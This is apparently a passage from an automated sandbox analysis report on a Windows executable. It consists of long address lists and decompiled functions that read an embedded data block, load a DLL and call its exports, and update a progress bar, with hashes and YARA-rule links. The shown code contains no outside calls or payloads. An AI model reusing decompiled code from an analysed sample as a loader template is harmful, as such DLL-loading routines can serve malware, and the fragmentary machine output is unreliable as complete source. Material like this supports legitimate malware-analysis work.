              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
              • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403411, Relevance: 4.6, APIs: 3, Instructions: 101COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00403411(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x3770f
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a270 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402FC6(1);
					return 0;
				}
				E00403590( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x3f4d2
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E0040357A(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a274 != 0 &&  *0x42a320 == 0) {
						_t19 =  *0x420f00; // 0x31437
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E00402FC6(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406AAC(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40ff7b
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x3770f
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E004060E4( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















              0x00403414
              0x00403421
              0x00403434
              0x00403439
              0x00403569
              0x0040356b
              0x00000000
              0x00403571
              0x00403445
              0x00403458
              0x0040345e
              0x00403464
              0x0040346f
              0x0040346f
              0x00403474
              0x00403479
              0x00403481
              0x00403483
              0x00403483
              0x0040348c
              0x00403493
              0x00000000
              0x00000000
              0x00403499
              0x0040349f
              0x004034a5
              0x00000000
              0x004034ab
              0x004034b1
              0x004034bb
              0x004034d1
              0x004034d6
              0x004034db
              0x004034e1
              0x004034e7
              0x004034f1
              0x004034f8
              0x00000000
              0x00000000
              0x004034fa
              0x00403500
              0x00403502
              0x00403525
              0x0040352b
              0x00000000
              0x00000000
              0x0040352d
              0x0040352f
              0x00000000
              0x00000000
              0x00403531
              0x00403531
              0x00403544
              0x00000000
              0x00000000
              0x00403553
              0x00000000
              0x00403553
              0x0040350c
              0x00403513
              0x00403560
              0x00403566
              0x00403566
              0x00000000
              0x00403566
              0x00403515
              0x0040351b
              0x00403521
              0x00000000
              0x00000000
              0x00000000
              0x00403564
              0x00403564
              0x00000000
              0x00403564
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 00403425
                • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
              • SetFilePointer.KERNELBASE(0003770F,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer$CountTick
              • String ID:
              • API String ID: 1092082344-0
              • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
              • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004020D0, Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E004020D0(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a338");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a308 =  *0x42a308 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402D3E(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402D3E(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E004069A0(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004055A4(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403BAB( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










              0x004020d0
              0x004020d0
              0x004020d5
              0x004020dc
              0x0040219b
              0x004022e9
              0x004022e9
              0x00402bc2
              0x00402bc5
              0x00402bd1
              0x00402bd1
              0x004020eb
              0x004020f5
              0x004020f8
              0x00402108
              0x0040210c
              0x00402112
              0x00402114
              0x00402117
              0x00402194
              0x00000000
              0x00402194
              0x00402119
              0x00402124
              0x00402128
              0x00402168
              0x0040212a
              0x0040212d
              0x00402130
              0x0040215c
              0x00402132
              0x00402135
              0x0040213e
              0x00402140
              0x00402140
              0x0040213e
              0x00402130
              0x00402170
              0x00402189
              0x00402189
              0x00000000
              0x00402170
              0x004020fb
              0x00402103
              0x00402106
              0x00000000
              0x00000000
              0x00000000

              APIs
              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
              • String ID:
              • API String ID: 334405425-0
              • Opcode ID: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction ID: f92bc13af20f738db02ac2fc0b39f0a9d6660206439d55b7b5299bd0a9e162c8
              • Opcode Fuzzy Hash: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction Fuzzy Hash: 4521C671600204EBCF10AFA5CE48A9E7B70AF44358F70413BF511B91E1C7BD8E82966E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403309, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E00403309(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2d8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403411(4);
				if(_t22 >= 0) {
					_t24 = E004060B5( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403411(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004060B5( *0x40a01c, 0x414ef0, _t28) == 0) {
											goto L18;
										}
										_t30 = E004060E4(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














              0x0040330d
              0x00403316
              0x0040331f
              0x00403323
              0x0040332e
              0x0040332e
              0x00403336
              0x0040333d
              0x0040334f
              0x00403356
              0x004033fb
              0x004033fb
              0x00000000
              0x0040335c
              0x0040335f
              0x0040336b
              0x0040336f
              0x00403409
              0x00403409
              0x00403375
              0x00403378
              0x004033d7
              0x004033dd
              0x004033df
              0x004033df
              0x004033f1
              0x004033f9
              0x00403400
              0x00403403
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040337a
              0x0040337d
              0x00000000
              0x00403383
              0x00403388
              0x0040338f
              0x00403392
              0x00403394
              0x00403394
              0x004033a1
              0x004033ab
              0x00000000
              0x00000000
              0x004033b4
              0x004033bb
              0x004033d3
              0x004033fd
              0x004033fd
              0x004033bd
              0x004033bd
              0x004033c0
              0x004033c3
              0x004033c9
              0x004033cf
              0x00000000
              0x004033d1
              0x00000000
              0x004033d1
              0x004033cf
              0x00000000
              0x004033bb
              0x00000000
              0x00403388
              0x0040337d
              0x00403378
              0x0040336f
              0x00403356
              0x0040340b
              0x0040340e

              APIs
              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
              • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a2b0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}










              0x0040138a
              0x004013fa
              0x0040139b
              0x004013a0
              0x00000000
              0x00000000
              0x004013a2
              0x004013a3
              0x004013ad
              0x00000000
              0x00401404
              0x004013b0
              0x004013b7
              0x004013bd
              0x004013be
              0x004013c0
              0x004013c2
              0x004013b9
              0x004013b9
              0x004013ba
              0x004013ba
              0x004013c9
              0x004013cb
              0x004013f4
              0x004013f4
              0x004013c9
              0x00000000

              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
              Memory Dump Source
